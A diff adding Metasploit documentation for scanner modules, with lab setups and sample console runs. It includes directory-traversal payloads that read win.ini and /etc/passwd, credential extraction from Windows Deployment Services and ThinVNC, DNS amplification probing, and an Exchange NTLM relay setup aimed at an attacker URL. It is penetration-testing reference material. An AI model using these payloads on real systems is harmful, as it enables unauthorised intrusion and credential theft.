+      [*] 172.17.0.2:50000      - Scanned 1 of 1 hosts (100% complete)
+      [*] Auxiliary module execution completed
+    ```

documentation/modules/auxiliary/scanner/db2/db2_version.md

@@ -0,0 +1,27 @@
+## Vulnerable Application
+
+This module queries a DB2 instance information.
+
+More information can be found on the [Rapid7 Vulnerability & Exploit Database page](https://www.rapid7.com/db/modules/auxiliary/scanner/db2/db2_version)
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use auxiliary/scanner/db2/db2_version`
+  3. Do: `set RHOSTS [ip]`
+  4. Do: `run`
+
+## Scenarios
+
+###  A run on Kali Linux 2019.3 and DB2 11.5.0.0a
+
+  ```
+  msf > use auxiliary/scanner/db2/db2_version
+  msf auxiliary(scanner/db2/db2_version) > show options
+  msf auxiliary(scanner/db2/db2_version) > set DATABASE testdb
+  msf auxiliary(scanner/db2/db2_version) > set RHOSTS 172.17.0.2
+  msf auxiliary(scanner/db2/db2_version) > run
+    [+] 172.17.0.2:50000      - 172.17.0.2:50000 DB2 - Platform: QDB2/LINUXX8664, Version: SQL11050, Instance: db2inst1, Plain-Authentication: OK
+    [*] 172.17.0.2:50000      - Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```

documentation/modules/auxiliary/scanner/dcerpc/windows_deployment_services.md

@@ -0,0 +1,41 @@
+## Vulnerable Application
+
+This module retrieves the client unattend file from Windows Deployment Services RPC service and parses out the stored credentials. Tested against Windows 2008 R2 x64 and Windows 2003 x86.
+
+More information can be found on the [Rapid7 Vulnerability & Exploit Database page](https://www.rapid7.com/db/modules/auxiliary/scanner/dcerpc/windows_deployment_services) and pull request [PR #1420](https://github.com/rapid7/metasploit-framework/pull/1420).
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use modules/auxiliary/scanner/dcerpc/windows_deployment_services`
+  3. set RHOST [ip]
+  4. Do: `run`
+
+## Scenarios
+
+### A run on Windows Server 2008 R2 X64
+
+  ```
+  msf > use modules/auxiliary/scanner/dcerpc/windows_deployment_services
+  msf auxiliary(scanner/dcerpc/windows_deployment_services) > show options
+  msf auxiliary(scanner/dcerpc/windows_deployment_services) > set RHOST 192.168.5.1
+  msf auxiliary(scanner/dcerpc/windows_deployment_services) > run
+
+    [*] Binding to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0:71710533-beba-4937-8319-b5dbef9ccc36:1@ncacn_ip_tcp:192.168.5.1[5040] ...
+    [+] Bound to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0:71710533-beba-4937-8319-b5dbef9ccc36:1@ncacn_ip_tcp:192.168.5.1[5040]
+    [*] Sending X64 Client Unattend request ...
+    [*] Raw version of X64 saved as: C:/Documents and Settings/user/.msf5/loot/20121213104745_default_192.168.5.1_windows.unattend_399005.txt
+    [+] Retrieved wds credentials for X64
+    [*] Sending X86 Client Unattend request ...
+    [*] Sending IA64 Client Unattend request ...
+
+      Windows Deployment Services
+      ===========================
+
+      Architecture  Type  Domain        Username  Password
+      ------------  ----  ------        --------  --------
+      X64           wds   Fabrikam.com  username  my_password
+
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```

documentation/modules/auxiliary/scanner/discovery/empty_udp.md

@@ -0,0 +1,30 @@
+## Vulnerable Application
+
+Detect UDP services that reply to empty probes.
+
+More information can be found on the [Rapid7 blog page](https://blog.rapid7.com/2014/10/03/adventures-in-empty-udp-scanning/)
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use auxiliary/scanner/discovery/empty_udp`
+3. Do: `set RHOSTS [ip]`
+4. Do: `set RPORT [port]`
+5. Do: `run`
+
+## Scenarios
+
+### A run against Windows XP (X64) using Kali Linux 2019.3
+
+  ```
+  msf auxiliary(scanner/dns/dns_amp) > use auxiliary/scanner/discovery/empty_udp
+  msf auxiliary(scanner/discovery/empty_udp) > set RHOSTS 1.1.1.1
+    RHOSTS => 1.1.1.1
+  msf auxiliary(scanner/discovery/empty_udp) > set RPORT 135
+    RPORT => 135
+  msf auxiliary(scanner/discovery/empty_udp) > run
+    [*] Sending 1032 empty probes to 1.1.1.1->1.1.1.1 (1 hosts)
+    [+] Received #52 from #:135:#1095/udp
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```

documentation/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.md

@@ -0,0 +1,26 @@
+## Vulnerable Application
+
+This module implements the DLSw information disclosure retrieval. There is a bug in Cisco's DLSw implementation affecting 12.x and 15.x trains that allows an unauthenticated remote attacker to retrieve the partial contents of packets traversing a Cisco router with DLSw configured and active.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use modules/auxiliary/scanner/dlsw/dlsw_leak_capture`
+3. Do: `set RHOSTS [ip]`
+4. Do: `run`
+
+## Scenarios
+
+### IOS version 12.4(8) and Kali Linux 2019.3
+
+  ```
+  msf > use modules/auxiliary/scanner/dlsw/dlsw_leak_capture
+  msf auxiliary(scanner/dlsw/dlsw_leak_capture) > set RHOSTS 192.168.0.1
+    RHOSTS => 192.168.0.1
+  msf auxiliary(scanner/dlsw/dlsw_leak_capture) > run
+    [*] 192.168.0.1:2067      - Checking for DLSw information disclosure (CVE-2014-7992)
+    [+] 192.168.0.1:2067      - Vulnerable to DLSw information disclosure; leaked 72 bytes
+    [*] 192.168.0.1:2067      - DLSw leaked data stored in /root/.msf4/loot/20191124231804_default_192.168.0.1_dlsw.packet.cont_518857.bin
+    [*] 192.168.0.1:2067      - Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```

documentation/modules/auxiliary/scanner/dns/dns_amp.md

@@ -0,0 +1,33 @@
+## Vulnerable Application
+
+This module can be used to discover DNS servers which expose recursive name lookups which can be used in an amplification attack against a third party.
+
+BIND 9.4.1-P1: [source](ftp://ftp.isc.org/isc/bind9/9.4.1-P1/bind-9.4.1-P1.tar.gz)
+Ubuntu 7.10: [Gutsy Gibbon](http://old-releases.ubuntu.com/releases/7.10/)
+
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use modules/auxiliary/scanner/dns/dns_amp`
+  3. Do: `set DOMAINNAME [domain]`
+  4. Do: `set RHOST [ip]`
+  5. Do: `run`
+
+## Scenarios
+
+### A run on Ubuntu 7.10 (Gutsy Gibbon) and BIND 9.4.1-P1
+
+  ```
+  msf > use modules/auxiliary/scanner/dns/dns_amp
+  msf auxiliary(scanner/dns/dns_amp) > set DOMAINNAME domain.com
+    DOMAINNAME => domain.com
+  msf auxiliary(scanner/dns/dns_amp) > set RHOSTS 192.168.10.254
+    RHOSTS => 192.168.10.254
+  msf auxiliary(scanner/dns/dns_amp) > run
+    [*] Sending DNS probes to 192.168.10.254->192.168.10.254 (1 hosts)
+    [*] Sending 70 bytes to each host using the IN ANY domain.com request
+    [+] 192.168.10.254:53 - Response is 374 bytes [5.34x Amplification]
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```

documentation/modules/auxiliary/scanner/ftp/konica_ftp_traversal.md

@@ -0,0 +1,29 @@
+## Vulnerable Application
+
+This module exploits a directory traversal vulnerability found in Konica Minolta FTP Utility 1.0.
+This vulnerability allows an attacker to download arbitrary files from the server by crafting a `RETR` command that includes file system traversal strings such as `..//`.
+
+Link to Konica Minolta FTP Utility 1.00 software download [Exploit-DB](https://www.exploit-db.com/apps/6388a2ae7dd2965225b3c8fad62f2b3b-ftpu_10.zip)
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use modules/auxiliary/scanner/ftp/konica_ftp_traversal`
+  3. Do: `set RHOSTS [ip]`
+  4. Do: `run`
+
+## Scenarios
+
+### Konica Minolta FTP Utility 1.00 on Windows 7 (X64)
+
+  ```
+  msf > use modules/auxiliary/scanner/ftp/konica_ftp_traversal
+  msf auxiliary(scanner/ftp/konica_ftp_traversal) > set RHOSTS 1.1.1.1
+    RHOSTS => 1.1.1.1
+  set PATH ../../WINDOWS/win.ini
+    PATH => ../../WINDOWS/win.ini
+  msf auxiliary(scanner/ftp/konica_ftp_traversal) > run
+  [+] 1.1.1.1:21      - Stored ../../WINDOWS/win.ini to /root/.msf4/loot/20191122042114_default_1.1.1.1_konica.ftp.data_003802.ini
+  [*] 1.1.1.1:21      - Scanned 1 of 1 hosts (100% complete)
+  [*] Auxiliary module execution completed
+  ```

documentation/modules/auxiliary/scanner/ftp/pcman_ftp_traversal.md

@@ -0,0 +1,52 @@
+## Vulnerable Application
+
+This module exploits a directory traversal vulnerability found in PCMan FTP Server 2.0.7.
+This vulnerability allows an attacker to download arbitrary files from the server by crafting a `RETR` command that includes file system traversal strings such as `..//`
+
+Linked to software download [Exploit-DB](https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z)
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use modules/auxiliary/scanner/ftp/pcman_ftp_traversal`
+  3. Do: `set RHOSTS [ip]`
+  4. Do: `run`
+
+## Scenarios
+
+### PCMan FTP Server 2.0.7 on Windows 7 (X64)
+
+  ```
+  msf > use modules/auxiliary/scanner/ftp/pcman_ftp_traversal
+  msf auxiliary(scanner/ftp/pcman_ftp_traversal) > show options
+  msf auxiliary(scanner/ftp/pcman_ftp_traversal) > set RHOST 1.1.1.1
+    rhost => 1.1.1.1
+  msf auxiliary(scanner/ftp/pcman_ftp_traversal) > set PATH WINDOWS\\win.ini
+    PATH => WINDOWS\win.ini
+  msf auxiliary(scanner/ftp/pcman_ftp_traversal) > run    
+    [+] 192.168.2.252:21      - Stored WINDOWS\win.ini to /root/.msf4/loot/20191120201523_default_1.1.1.1_pcman.ftp.data_069450.ini
+    [*] 192.168.2.252:21      - Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+  ```
+
+### Manual Exploitation
+
+  ```
+  2019/11/20 [12:46] (00588) 1.1.1.2> User connecting from 1.1.1.2
+
+  2019/11/20 [12:46] (00588) 1.1.1.2> USER anonymous
+  2019/11/20 [12:46] (00588) Anonymous> 331 User name okay, need password.
+
+  2019/11/20 [12:46] (00588) Anonymous> PASS *****
+  2019/11/20 [12:46] (00588) Anonymous> 230 User logged in
+
+  2019/11/20 [12:46] (00588) Anonymous> PASV
+  2019/11/20 [12:46] (00588) Anonymous> 227 Entering Passive Mode (1.1.1.1,8,1)
+
+  2019/11/20 [12:46] (00588) Anonymous> RETR ..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//WINDOWS\win.ini
+  2019/11/20 [12:46] (00588) Anonymous> 150 File status okay; Open data connection.
+
+  2019/11/20 [12:46] (00588) Anonymous> 226 Data Sent okay.
+
+  2019/11/20 [12:46] (00588) Anonymous> User Disconnected.
+  ```

documentation/modules/auxiliary/scanner/http/exchange_web_server_pushsubscription.md

@@ -0,0 +1,37 @@
+## Vulnerable Application
+
+  * Microsoft Exchange 2013 and 2016
+  * Tested on Exchange 2016
+  * Usage:
+    * Download and install Exchange Server within a Windows domain
+    * Setup a mailbox with a domain user
+    * Run the module
+    * Relay the NTLM authentication to the DC
+
+## Verification Steps
+
+  Example steps:
+
+  1. Start msfconsole
+  2. Do: ```use auxiliary/scanner/http/exchange_web_server_pushsubscription```
+  3. Do: ```set attacker_url <url>```
+  4. Do: ```set rport <target_port>```
+  5. Do: ```set rhost <target_IP>```
+  6. Do: ```set domain <domain_name>```
+  7. Do: ```set password <user_pass>```
+  8. Do: ```set username <user_pass>```
+  9. Do: ```run```
+
+## Options
+
+  **The ATTACKER_URL option**
+
+  This option should contain a URL under the attacker's control. This is where the Exchange will try to authenticate.
+
+  **The PASSWORD option**
+  This can be either the password or the NTLM hash of any domain user with a mailbox configured on Exchange.
+
+## Scenarios
+
+  This module can be used to make a request to the Exchange server and force it to authenticate to a URL under our control. 
+  An example scenario is that when this module is combined with an NTLM relay attack, if the Exchange server has the necessary permissions it is possible to grant us DCSync rights.

documentation/modules/auxiliary/scanner/http/git_scanner.md

@@ -0,0 +1,67 @@
+## Vulnerable Application
+
+This module looks for a `.git` folder on a web server, and attempts to read the `config` and `index` files to gather information about the repo.
+
+### Environment
+
+On Kali, we can clone metasploit into the apache folder to create a vulnerable environment.
+
+```
+root@kali:~# cd /var/www/html/
+root@kali:/var/www/html# git clone https://github.com/rapid7/metasploit-framework.git
+Cloning into 'metasploit-framework'...
+remote: Enumerating objects: 49, done.
+remote: Counting objects: 100% (49/49), done.
+remote: Compressing objects: 100% (41/41), done.
+remote: Total 509870 (delta 18), reused 20 (delta 8), pack-reused 509821
+Receiving objects: 100% (509870/509870), 415.71 MiB | 8.61 MiB/s, done.
+Resolving deltas: 100% (372897/372897), done.
+Updating files: 100% (10064/10064), done.
+root@kali:/var/www/html# service apache2 start
+```
+
+## Verification Steps
+
+  1. Install a git repo in a web server
+  2. Start msfconsole
+  3. Do: ```use auxiliary/scanner/http/git_scanner```
+  4. Do: ```set rhosts [ip]```
+  5. Do: ```run```
+  6. You should get information about the git repo
+
+## Options
+
+  **GIT_CONFIG**
+
+  Attempts to locate the `config` file, which may contain useful information.  Default is `true`.
+
+  **GIT_INDEX**
+
+  Attempts to locate the `index` file, which identifies the git version and number of files.  Default is `true`.
+
+  **TARGETURI**
+
+  Where the `.git` folder is located.  Default is `/.git/`
+
+  **UserAgent**
+
+  The user agent to emulate.  Default is `git/1.7.9.5`.
+
+## Scenarios
+
+### Metasploit git on Kali
+
+```
+msf5 > use auxiliary/scanner/http/git_scanner 
+msf5 auxiliary(scanner/http/git_scanner) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 auxiliary(scanner/http/git_scanner) > set TARGETURI /metasploit-framework/.git/
+TARGETURI => /metasploit-framework/.git/
+msf5 auxiliary(scanner/http/git_scanner) > run
+
+[+] http://127.0.0.1/metasploit-framework/.git/ - git repo (version 2) found with 10064 files
+[+] http://127.0.0.1/metasploit-framework/.git/config - git config file found
+[+] Saved file to: /root/.msf4/loot/20191007202314_default_127.0.0.1_config_236738.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

documentation/modules/auxiliary/scanner/http/goahead_traversal.md

@@ -0,0 +1,154 @@
+## Vulnerable Application
+
+GoAhead web server by EmbedThis versions from 3.0.0 through 3.4.1 contains a directory traversal vulnerability.
+To exploit this vulnerability, each `../` must be matched with a `.x/`, with each being grouped together.
+For instance a depth of 2 will look as follows: `../../.x/.x/foobar`.
+
+An excellent writeup is available on [PacketStorm](https://packetstormsecurity.com/files/131156/GoAhead-3.4.1-Heap-Overflow-Traversal.html).
+
+### Install on Kali
+
+Since `goahead` is available on Git, we can simply download the vulnerable version, compile, and run it.
+
+```
+root@kali:/tmp# wget https://github.com/embedthis/goahead/archive/v3.4.1.tar.gz
+--2019-10-07 20:42:28--  https://github.com/embedthis/goahead/archive/v3.4.1.tar.gz
+Resolving github.com (github.com)... 192.30.253.113
+Connecting to github.com (github.com)|192.30.253.113|:443... connected.
+HTTP request sent, awaiting response... 302 Found
+Location: https://codeload.github.com/embedthis/goahead/tar.gz/v3.4.1 [following]
+--2019-10-07 20:42:29--  https://codeload.github.com/embedthis/goahead/tar.gz/v3.4.1
+Resolving codeload.github.com (codeload.github.com)... 192.30.253.120
+Connecting to codeload.github.com (codeload.github.com)|192.30.253.120|:443... connected.
+HTTP request sent, awaiting response... 200 OK
+Length: unspecified [application/x-gzip]
+Saving to: ‘v3.4.1.tar.gz’
+
+v3.4.1.tar.gz                                   [     <=>                                                                                 ]   5.95M  6.35MB/s    in 0.9s    
+
+2019-10-07 20:42:30 (6.35 MB/s) - ‘v3.4.1.tar.gz’ saved [6234594]
+
+root@kali:/tmp# tar -zxf v3.4.1.tar.gz 
+root@kali:/tmp# cd goahead-3.4.1/
+root@kali:/tmp/goahead-3.4.1# make
+make --no-print-directory -f projects/goahead-linux-default.mk all
+      [Info] Use make SHOW=1 to trace executed commands.
+      [Copy] build/linux-x64-default/bin/ca.crt
+      [Copy] build/linux-x64-default/inc/osdep.h
+      [Copy] build/linux-x64-default/inc/est.h
+   [Compile] build/linux-x64-default/obj/estLib.o
+      [Link] build/linux-x64-default/bin/libest.so
+      [Copy] build/linux-x64-default/inc/goahead.h
+      [Copy] build/linux-x64-default/inc/js.h
+   [Compile] build/linux-x64-default/obj/action.o
+   [Compile] build/linux-x64-default/obj/alloc.o
+   [Compile] build/linux-x64-default/obj/auth.o
+   [Compile] build/linux-x64-default/obj/cgi.o
+   [Compile] build/linux-x64-default/obj/crypt.o
+   [Compile] build/linux-x64-default/obj/file.o
+   [Compile] build/linux-x64-default/obj/fs.o
+   [Compile] build/linux-x64-default/obj/http.o
+   [Compile] build/linux-x64-default/obj/js.o
+   [Compile] build/linux-x64-default/obj/jst.o
+   [Compile] build/linux-x64-default/obj/options.o
+   [Compile] build/linux-x64-default/obj/osdep.o
+   [Compile] build/linux-x64-default/obj/rom-documents.o
+   [Compile] build/linux-x64-default/obj/route.o
+   [Compile] build/linux-x64-default/obj/runtime.o
+   [Compile] build/linux-x64-default/obj/socket.o
+   [Compile] build/linux-x64-default/obj/upload.o
+   [Compile] build/linux-x64-default/obj/est.o
+   [Compile] build/linux-x64-default/obj/matrixssl.o
+   [Compile] build/linux-x64-default/obj/nanossl.o
+   [Compile] build/linux-x64-default/obj/openssl.o
+      [Link] build/linux-x64-default/bin/libgo.so
+   [Compile] build/linux-x64-default/obj/goahead.o
+      [Link] build/linux-x64-default/bin/goahead
+   [Compile] build/linux-x64-default/obj/test.o
+      [Link] build/linux-x64-default/bin/goahead-test
+   [Compile] build/linux-x64-default/obj/gopass.o
+      [Link] build/linux-x64-default/bin/gopass
+
+You can now install via "sudo make  install" or run GoAhead via: "sudo make run"
+To run locally, put linux-x64-default/bin in your path
+
+root@kali:/tmp/goahead-3.4.1# build/linux-x64-default/bin/goahead --verbose --home test /var/www/html/
+```
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use auxiliary/scanner/http/goahead_traversal```
+  4. Do: ```set rhosts [ip]```
+  5. Do: ```set depth [number]```
+  6. Do: ```run```
+  7. You should get the file contents.
+
+## Options
+
+  **DEPTH**
+
+  The depth to traverse from the webroot.  This does not need to be exact, overshooting (using a number larger than needed)
+  will still result in the file being obtained.  Default is `5`
+
+  **FILEPATH**
+
+  The path to the file to read.  Default is `/etc/passwd`.
+
+## Scenarios
+
+### GoAhead 3.4.1 on Kali
+
+Install from the instructions at the top of this document.
+
+```
+msf5 > use auxiliary/scanner/http/goahead_traversal 
+msf5 auxiliary(scanner/http/goahead_traversal) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 auxiliary(scanner/http/goahead_traversal) > set depth 5
+depth => 5
+msf5 auxiliary(scanner/http/goahead_traversal) > run
+
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+
+[+] File saved in: /root/.msf4/loot/20191007213309_default_127.0.0.1_goahead.traversa_324804.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+#### Server Logs
+
+When setting the server to verbose output, the following is shown during exploitation:
+
+```
+# build/linux-x64-default/bin/goahead --verbose --home test /var/www/html/
+goahead: 2: Configuration for Embedthis GoAhead
+goahead: 2: ---------------------------------------------
+goahead: 2: Version:            3.4.1
+goahead: 2: BuildType:          Debug
+goahead: 2: CPU:                x64
+goahead: 2: OS:                 linux
+goahead: 2: Host:               127.0.1.1
+goahead: 2: Directory:          /var/www/html/goahead-3.4.1/test
+goahead: 2: Documents:          /var/www/html/
+goahead: 2: Configure:          me -d -q -platform linux-x86-default -configure . -with est -gen make
+goahead: 2: ---------------------------------------------
+goahead: 2: Started http://*:80
+goahead: 2: Started https://*:443
+goahead: 2: GET ../../../../../.x/.x/.x/.x/.x/etc/passwd HTTP/1.1
+```

documentation/modules/auxiliary/scanner/http/http_header.md

@@ -22,7 +22,7 @@ Module options (auxiliary/scanner/http/http_header):
    Name         Current Setting                                                        Required  Description
    ----         ---------------                                                        --------  -----------
    HTTP_METHOD  HEAD                                                                   yes       HTTP Method to use, HEAD or GET (Accepted: GET, HEAD)
-   IGN_HEADER   Vary,Date,Content-Length,Connection,Etag,Expires,Pragma,Accept-Ranges  yes       List of headers to ignore, seperated by comma
+   IGN_HEADER   Vary,Date,Content-Length,Connection,Etag,Expires,Pragma,Accept-Ranges  yes       List of headers to ignore, separated by comma
    Proxies                                                                             no        A proxy chain of format type:host:port[,type:host:port][...]
    RHOSTS                                                                              yes       The target address range or CIDR identifier
    RPORT        80                                                                     yes       The target port (TCP)

documentation/modules/auxiliary/scanner/http/onion_omega2_login.md

@@ -16,7 +16,7 @@ The onion_omega2_login module is used to brute-force credentials for Onion Omage
 4. Do: `use auxiliary/scanner/http/onion_omega2_login`
 5. Do: `set RHOSTS 192.168.3.1`
 6. Do: `set USERPASS_FILE <user pass dictionary>`
-    - username and password seperated by space and one pair per line.
+    - username and password separated by space and one pair per line.
 7. Do: `run`
 
 Sample userpass file:

documentation/modules/auxiliary/scanner/http/thinvnc_travesal.md

@@ -0,0 +1,38 @@
+## Description
+
+  This module exploits a directory traversal vulnerability in ThinVNC
+  versions 1.0b1 and prior which allows unauthenticated users to retrieve
+  arbitrary files, including the ThinVNC configuration file.
+
+## Vulnerable Application
+
+  This module has been tested successfully on ThinVNC versions 1.0b1
+  and "ThinVNC_Latest" (2018-12-07).
+
+  ThinVNC is available on [Sourceforge](https://sourceforge.net/projects/thinvnc/files/).
+
+## Verification Steps
+
+  1. `./msfconsole`
+  2. `use auxiliary/scanner/http/thinvnc_traversal`
+  3. `set rhosts <rhost>`
+  4. `run`
+
+## Scenarios
+
+  ### ThinVNC version 1.0b1 on Windows XP SP3
+
+  ```
+  msf5 > use auxiliary/scanner/http/thinvnc_traversal 
+  msf5 auxiliary(scanner/http/thinvnc_traversal) > set rhosts 172.16.123.123
+  rhosts => 172.16.123.123
+  msf5 auxiliary(scanner/http/thinvnc_traversal) > run
+
+  [+] File ThinVnc.ini saved in: /root/.msf4/loot/20191017033828_default_172.16.123.123_thinvnc.traversa_713640.txt
+  [+] Found credentials: admin:admin
+  [*] Scanned 1 of 1 hosts (100% complete)
+  [*] Auxiliary module execution completed
+
+  msf5 auxiliary(scanner/http/thinvnc_traversal) > 
+  ```
+

documentation/modules/auxiliary/scanner/http/title.md

@@ -0,0 +1,111 @@
+## Description
+
+Generates a GET request to the provided web servers and returns the server header, HTML title attribute and location header (if set). This is useful for rapidly identifying interesting web applications en mass.
+
+## Verification Steps
+
+  1. Do: `use auxiliary/scanner/http/title`
+  2. Do: `set rhosts [ips]`
+  3. Do: `run`
+
+## Options
+
+**SHOW_TITLES**
+
+If set to `false`, will not show the titles on the console as they are grabbed. Defaults to `true`.
+
+**STORE_NOTES**
+
+If set to `false`, will not store the captured information in notes. Use `notes -t http.title` to view. Defaults to `true`.
+
+## Scenarios
+
+### Apache/2.4.38 inside a Docker container
+
+  ```
+msf5 > use auxiliary/scanner/http/title
+msf5 auxiliary(scanner/http/title) > set RHOSTS 172.17.0.2
+RHOSTS => 172.17.0.2
+msf5 auxiliary(scanner/http/title) > run
+
+[+] [172.17.0.2:80] [C:200] [R:] [S:Apache/2.4.38 (Debian)] LOCAL TESTING
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+  ```
+
+## Confirming using Burp Suite Community Edition
+
+### HTTP GET Request 
+
+```
+GET / HTTP/1.1
+Host: 172.17.0.2
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+```
+
+### Server Response
+
+```
+HTTP/1.1 200 OK
+Date: Wed, 16 Oct 2019 17:27:49 GMT
+Server: Apache/2.4.38 (Debian)
+X-Powered-By: PHP/7.2.23
+Content-Length: 68
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+<html><head><title>LOCAL TESTING</title></head><body></body></html>
+```
+
+## Confirming using Nikto
+
+This will only identify server version and Location header, not HTML title.
+
+```
+nikto -host http://172.17.0.2 -Plugin headers
+
+- Nikto v2.1.6
+---------------------------------------------------------------------------
++ Target IP:          172.17.0.2
++ Target Hostname:    172.17.0.2
++ Target Port:        80
++ Start Time:         2019-10-16 19:30:55 (GMT2)
+---------------------------------------------------------------------------
++ Server: Apache/2.4.38 (Debian)
++ Retrieved x-powered-by header: PHP/7.2.23
+```
+
+## Confirming using NMAP
+
+Utilizing the [http-title](https://nmap.org/nsedoc/scripts/http-title.html) NMAP script.
+
+```
+# nmap -sV -p80 --script http-title 127.0.0.1
+Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-20 21:11 EDT
+Nmap scan report for localhost (127.0.0.1)
+Host is up (0.000049s latency).
+
+PORT   STATE SERVICE VERSION
+80/tcp open  http    Apache httpd 2.4.41 ((Debian))
+|_http-server-header: Apache/2.4.41 (Debian)
+|_http-title: Apache2 Debian Default Page: It works
+
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+Nmap done: 1 IP address (1 host up) scanned in 6.42 seconds
+```
+
+## Confirming using CURL
+
+This will use `grep` to filter for just the content between the title tags.
+
+```
+# curl -s 127.0.0.1:80 | grep \<title\>
+<title>Apache2 Debian Default Page: It works</title>
+```

documentation/modules/auxiliary/scanner/http/wordpress_scanner.md

@@ -0,0 +1,101 @@
+## Description
+
+Detects Wordpress installations and their version number.
+
+
+## Vulnerable Application
+
+### Setup using Docksal
+Install [Docksal](https://docksal.io/)
+
+Create a new WordPress installation using `fin project create`
+
+```
+fin project create
+1. Name your project (lowercase alphanumeric, underscore, and hyphen): msf-wp
+
+2. What would you like to install?
+  PHP based
+    1.  Drupal 8
+    2.  Drupal 8 (Composer Version)
+    3.  Drupal 7
+    4.  Wordpress
+    5.  Magento
+    6.  Laravel
+    7.  Symfony Skeleton
+    8.  Symfony WebApp
+    9.  Grav CMS
+    10. Backdrop CMS
+
+  Go based
+    11. Hugo
+
+  JS based
+    12. Gatsby JS
+    13. Angular
+
+  HTML
+    14. Static HTML site
+
+Enter your choice (1-14): 4
+
+Project folder:   /home/weh/dev/msf-wp
+Project software: Wordpress
+Project URL:      http://msf-wp.docksal
+
+Do you wish to proceed? [y/n]: y
+Cloning repository...
+Cloning into 'msf-wp'...
+...
+3. Installing site
+ Step 1  Initializing stack...
+Removing containers...
+...
+Starting services...
+Creating network "msf-wp_default" with the default driver
+Creating volume "msf-wp_cli_home" with default driver
+Creating volume "msf-wp_project_root" with local driver
+Creating volume "msf-wp_db_data" with default driver
+Creating msf-wp_db_1  ... done
+Creating msf-wp_cli_1 ... done
+Creating msf-wp_web_1 ... done
+Connected vhost-proxy to "msf-wp_default" network.
+Waiting for project stack to become ready...
+ Step 2  Initializing site...
+ Step 2  Generating wp-config.php...
+Success: Generated 'wp-config.php' file.
+ Step 3  Installing site...
+msmtp: envelope-from address is missing
+Success: WordPress installed successfully.
+
+Open http://msf-wp.docksal in your browser to verify the setup.
+Admin panel: http://msf-wp.docksal/wp-admin. User/password: admin/admin  
+ DONE!  Completed all initialization steps.
+```
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/wordpress_sanner```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set VHOST [HOSTNAME]```
+4. Do: ```run```
+
+### Wordpress 5.2 running in Docksal
+
+Follow the Instructions above to setup the Docksal Containers.
+
+```
+msf5 > use auxiliary/scanner/http/wordpress_scanner
+msf5 auxiliary(scanner/http/wordpress_scanner) > set RHOST msf-wp.docksal
+RHOST => msf-wp.docksal
+msf5 auxiliary(scanner/http/wordpress_scanner) > set VHOST msf-wp.docksal
+VHOST => msf-wp.docksal
+msf5 auxiliary(scanner/http/wordpress_scanner) > run
+
+[*] Trying 192.168.64.100
+[+] 192.168.64.100 running Wordpress 5.2
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/http/wordpress_scanner) > 
+
+```

documentation/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.md

@@ -0,0 +1,166 @@
+## Description
+  This module attempts to authenticate against a Wordpress-site (via 
+  XMLRPC) using username and password combinations indicated by the 
+  `USER_FILE`, `PASS_FILE`, and `USERPASS_FILE` options.
+
+## References
+* [https://codex.wordpress.org/XML-RPC_Support](https://codex.wordpress.org/XML-RPC_Support)
+* [http://www.ethicalhack3r.co.uk/security/introduction-to-the-wordpress-xml-rpc-api/](http://www.ethicalhack3r.co.uk/security/introduction-to-the-wordpress-xml-rpc-api/)
+
+## Vulnerable Application
+
+### Setup using Docksal
